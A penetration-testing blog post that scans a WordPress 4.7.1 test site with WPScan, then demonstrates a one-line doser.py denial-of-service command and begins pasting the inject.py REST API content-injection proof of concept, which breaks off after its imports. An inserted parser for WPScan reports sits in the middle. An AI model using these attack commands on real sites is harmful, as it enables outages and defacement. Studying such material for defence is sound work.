CHIT – Linux, Security, WordPress, Ethical Hacking, Penetration Testing…


Hacking WordPress – Content Injection Exploit and DoS

on 27 May 2019 at 15:30
Posted In: Ethical Hacking / Penetration Testing, Security / Anonymity, WordPress

In this example we will exploit a few vulnerabilities in WordPress version 4.7.1. First, scan the site for vulnerabilities with WPScan.

Detecting vulnerabilities in WordPress with WPScan

workstation:/home/chit # wpscan --url http://chit-test.ch
WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.7
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://chit-test.ch/
[+] Started: Wed May 22 18:07:18 2019

Interesting Finding(s):

[+] http://chit-test.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 4.7.1 identified (Insecure, released on 2017-01-11).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://chit-test.ch/?feed=rss2, https://wordpress.org/?v=4.7.1
 |  - http://chit-test.ch/?feed=comments-rss2, https://wordpress.org/?v=4.7.1
 |
 | [!] 44 vulnerabilities identified:
 |
 | [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8729
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
 |      - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
 |      - https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
 |
 | [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8730
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
 |      - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
 |      - https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
 |
 | [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8731
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
 |      - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
 |      - https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
 |
 | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8734
 |      - https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
 |      - https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
 |      - https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
 |      - https://github.com/WordPress/WordPress/commit/e357195ce303017d517aff944644a7a1232926f7
 |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_content_injection
 |
 | [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8765
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
 |      - https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
 |      - http://seclists.org/oss-sec/2017/q1/563
 |
 | [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8766
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
 |
 | [!] Title: WordPress 4.7.0-4.7.2 - Authenticated Unintended File Deletion in Plugin Delete
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8767
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6816
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/4d80f8b3e1b00a3edcee0774dc9c2f4c78f9e663
 |
 | [!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8768
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
 |      - https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
 |
 | [!] Title: WordPress 4.7-4.7.2 - Cross-Site Scripting (XSS) via Taxonomy Term Names
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8769
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6818
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/9092fd01e1f452f37c313d38b18f9fe6907541f9
 |
 | [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8770
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
 |      - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
 |      - http://seclists.org/oss-sec/2017/q1/562
 |      - https://hackerone.com/reports/153093
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8815
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
 |      - https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |
 | [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8816
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
 |
 | [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks 
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8817
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
 |
 | [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8818
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
 |      - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
 |
 | [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8819
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
 |      - https://hackerone.com/reports/203515
 |      - https://hackerone.com/reports/203515
 |
 | [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8820
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8906
 |      - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://wpvulndb.com/vulnerabilities/8905
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |
 | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer 
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41397
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.7.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.7.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentyseventeen
 | Location: http://chit-test.ch/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://chit-test.ch/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://chit-test.ch/wp-content/themes/twentyseventeen/style.css?ver=4.7.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://chit-test.ch/wp-content/themes/twentyseventeen/style.css?ver=4.7.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins

[i] No plugins Found.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:00 <====================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Finished: Wed May 22 18:07:21 2019
[+] Requests Done: 70
[+] Cached Requests: 4
[+] Data Sent: 10.706 KB
[+] Data Received: 23.486 MB
[+] Memory used: 72.094 MB
[+] Elapsed time: 00:00:02
workstation:/home/chit #

As the output shows, WPScan detected 44 vulnerabilities.
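The following is an added example (not part of the original post or of WPScan itself): a small parser for the text report above that pulls out each "[!] Title:" block with its "Fixed in" version and references, lists the findings WPScan shows no fix for, and works out the lowest release that closes all the patched ones. The report excerpt inside it is a constructed five-entry sample in the same format.

```python
import re

# Constructed sample: five entries in the format of the WPScan 3.x report above.
SAMPLE_REPORT = """\
[+] WordPress version 4.7.1 identified (Insecure, released on 2017-01-11).
 | Detected By: Rss Generator (Passive Detection)
 |
 | [!] 5 vulnerabilities identified:
 |
 | [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8730
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
 |
 | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8734
 |
 | [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
 |     Fixed in: 4.7.3
 |     References:
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.13
 |     References:
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787

[+] WordPress theme in use: twentyseventeen
"""

VERSION_RE = re.compile(r"WordPress version (\d+(?:\.\d+)*) identified")
TITLE_RE = re.compile(r"\[!\] Title: (.+)")
FIXED_RE = re.compile(r"Fixed in: (\S+)")
REF_RE = re.compile(r"- (https?://\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_wpscan(report):
    """Return (detected_version, findings). Each finding is a dict with the
    title, the 'Fixed in' version (None when WPScan lists no fix), the
    reference URLs and the CVE ids found inside those URLs."""
    version, findings, current = None, [], None
    for raw in report.splitlines():
        line = raw.strip().lstrip("|").strip()  # drop WPScan's " | " gutter
        m = VERSION_RE.search(line)
        if m:
            version = m.group(1)
            continue
        m = TITLE_RE.search(line)
        if m:
            current = {"title": m.group(1).strip(), "fixed_in": None,
                       "refs": [], "cves": []}
            findings.append(current)
            continue
        if current is None:
            continue
        m = FIXED_RE.search(line)
        if m:
            current["fixed_in"] = m.group(1)
            continue
        m = REF_RE.search(line)
        if m:
            current["refs"].append(m.group(1))
            current["cves"].extend(CVE_RE.findall(m.group(1)))
    return version, findings


def version_key(version):
    """'4.7.13' -> (4, 7, 13): compare releases numerically, because as
    strings '4.7.2' would sort after '4.7.13'."""
    return tuple(int(part) for part in version.split("."))


def patch_summary(report):
    """Condense a report into what a defender needs to act on."""
    version, findings = parse_wpscan(report)
    fixed = [f["fixed_in"] for f in findings if f["fixed_in"]]
    return {
        "detected": version,
        "total": len(findings),
        # Highest 'Fixed in' value = lowest release closing every patched finding.
        "upgrade_to": max(fixed, key=version_key) if fixed else None,
        "unpatched": [f["title"] for f in findings if not f["fixed_in"]],
        "cves": sorted({c for f in findings for c in f["cves"]}),
    }


if __name__ == "__main__":
    summary = patch_summary(SAMPLE_REPORT)
    print("WordPress %s: %d findings, upgrade to at least %s"
          % (summary["detected"], summary["total"], summary["upgrade_to"]))
    for title in summary["unpatched"]:
        print(" - no fix listed:", title)
```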

WordPress Application Denial of Service (DoS)

Let us now look at one of the vulnerabilities WPScan found: a DoS attack against the application (WordPress) itself.

 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html

With this type of DoS attack a single attacker would be enough to make the site unreachable, a result that normally requires a DDoS attack, where the traffic comes from many hosts at once.

As you can see, WPScan always provides very useful links about the vulnerabilities it finds.

For more information on this vulnerability, see the following link provided by WPScan: https://thehackernews.com/2018/02/wordpress-dos-exploit.html.

To test this type of attack, download the doser.py program from the following link, found among the references provided by WPScan: https://github.com/quitten/doser.py.

Once downloaded, run it as follows:

user@workstation:~/Programmi/doser.py-master> python doser.py -t 999 -g http://chit-test.ch

WordPress Hacking - DoS Attack

Unauthenticated Page/Post Content Modification via REST API

With this exploit it is possible to modify the content (content injection) of the posts on the targeted WordPress blog.

For more information see also: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html.

 | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8734
 |      - https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
 |      - https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
 |      - https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
 |      - https://github.com/WordPress/WordPress/commit/e357195ce303017d517aff944644a7a1232926f7
 |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_content_injection

WordPress 4.7.0-1 Content Injection Exploit – Inject.py

To exploit this vulnerability, download inject.py from the link provided by WPScan: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab, or create the file yourself and paste in the code.

Create a text file with Vi by running the following command.

user@workstation:~> vi inject.py

Copy the code below, paste it in, then save and exit.

# 2017 - @leonjza
#
# WordPress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
#
# Note: this is a Python 2 script (it uses urllib2); run it with python2.

# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
#  - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# Update post with content from a file:
#
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!

import json
import sys
import urllib2

from lxml import etree


